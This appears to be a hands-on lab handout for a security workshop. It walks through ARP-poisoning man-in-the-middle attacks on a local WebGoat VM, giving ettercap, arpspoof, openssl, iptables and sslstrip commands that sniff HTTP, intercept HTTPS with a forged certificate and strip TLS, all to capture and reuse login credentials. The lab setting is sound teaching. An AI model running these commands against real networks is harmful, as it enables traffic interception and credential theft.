# Man in the middle attacks - (Script kiddie) Overview

## Abstract

This set of exercises will show three different types of Man in the middle attacks (MITM). Their common nominator is the fact that they all can be performed with very little knowledge of the underlying technology with tools easily available.

## What is a "Man in the middle" attack.

As the name implies, the goal is to establish one self between two communicating nodes. Hiding ones presence is a core aspect of the attack. 

Techniques for doing this can range between physicly connecting hardware between the nodes to using complex protocol specific weaknesses.  

During the exercises, we will focus on so called ARP poisoning

## Preparations

If you have no or little experience of the protocols we will be working with (ARP, IP, TCP and SSL) it's recommended that you gain some **basic understanding** of these.  

We suggest doing the following:  

1. Take a couple of minutes and read about the OSI model. The swedish [wikipedia page](https://sv.wikipedia.org/wiki/OSI-modellen) contains a good bite size amount of information. The entry regarding [ARP](https://sv.wikipedia.org/wiki/Address_Resolution_Protocol) is also a highly recomended read in this context.

2. After getting some basic grasps of the abstrations used you can see them in action fairly easily.  

	Open up your Kali instances GUI and fire up `Wireshark` (under 09 - Sniffing & Spoofing). Write `icmp` in the display filter field and then double click the `eth0` interface.  

	After doing this open up a terminal and ping `8.8.8.8` (google DNS service). You should see the pings being displayed in Wireshark

	Press the `stop button`and start examining the traffic captured. Can you organize the data into the OSI model you just read about? (because you did read it right?)

3. Start a new capture, but this time write `http` in the display filter field. Visit `mejsla.se`. Try to organize the data as in previous step. Can you spot any differances OSI layer wise?

After completing these steps you hopefully feel like you have some understanding of the above mentioned protocols. If not, don't hesitate to ask your neighbour or one of the organizers.

## Attacks

All attacks will be performed on the "Host-only network". The VM host (your computer) will be a victim of the Kali instance while accessing the WebGoat instance.

### Sniffing clear text HTTP with ettercap

#### Description

This attack will intercept unencrypted http traffic.

#### Execution

1. For extra realism, use a tool such nmap to find the IP-addresses of the victims.
2. Once you have the IP addresses, execute `ettercap -T -i eth1 -M arp /<vmhost>// /<webgoat>//`
3. Navigate to the WebGoat login page on port 8080 (plain http directly on tomcat) and sign in.
4. Locate the user credentials in ettercaps logs (maybe you can load them into wireshark for easier parsing?).
5. Login with the stolen credentials.

#### Questions

1. This was performed in a wirebound switched network. Could in be done easier in a wireless network, and in that case why?
2. What is going on the network during the attack?
3. Why is it important to let ettercap perform a clean shutdown?

### HTTP dissection attack with ettercap

#### Description

This attack exploits one of the most common weaknesses of inexprecienced users, the practice of accepting unthrusted certificates.

#### Execution

*Please notice Ettercap seems a bit unstable when using this functionallity, and might crash sometimes.*

1. (Optional) For extra realism, make sure that you have temporarly thrusted the CA found on the WebGoat instance (see README). You should have a "green bar" when visiting webgoat over standard http ports (80/443).
2. Generate a private key to be used by ettercap.
	1. `cd /etc/ettercap`
	2. `openssl genrsa -out etter.ssl.crt 2048`
	3. `openssl req -new -key etter.ssl.crt -out tmp.csr`
	4. `openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.new`
	5. `cat tmp.new >> etter.ssl.crt`
	6. `rm -f tmp.new tmp.csr`
3. Enable traffic redirection
	1. Open `/etc/ettercap/etter.conf`
	2. Navigate to the `redir_command` section
	3. Make sure the commands for Linux iptables is uncommented.
4. Make sure ettercap stays running as root.
	1. Open `/etc/ettercap/etter.conf`
	2. Find the following lines:  

	  ec_uid = 65534                # nobody is the default  
	  ec_gid = 65534                # nobody is the default

	  And update to:

	  ec_uid = 0                # nobody is the default  
	  ec_gid = 0                # nobody is the default

5. Execute `ettercap -T -i eth1 -M arp /<vmhost>// /<webgoat>//`
6. Navigate to the WebGoat login page and login.
7. Locate the user credentials in ettercaps logs (maybe you can load them into wireshark for easier parsing?).
8. Login with the stolen credentials

#### Questions

1. Why did ettercap needed to be told about the iptables commands?
2. Would this be any easier to perform in a wireless network?

### SSL-Strip attack with arpspoof & sslstrip

#### Description

This attack exploits the facts that a large amount of webservers, like the NGINX instance on the WebGoat instance, are configured to redirect clients on port 80 (http) to port 443 (https).

#### Execution

During this attack we will utilize more than one tool. Use screen/tmux or several ssh sessions.

1. Start an ARP poison attack with arpspoof: `arpspoof -i eth1 -r -t <vmhost> <webgoat>`
2. Start sslstrip: `sslstrip`
3. Redirect http traffic to sslstrip: `iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000`
4. Navigate to the WebGoat login page and login.
5. Locate the user credentials in sslstrip's log file (default: sslstrip.log)
6. Login with the stolen credentials

#### Questions

1. How can this attack be protected from?
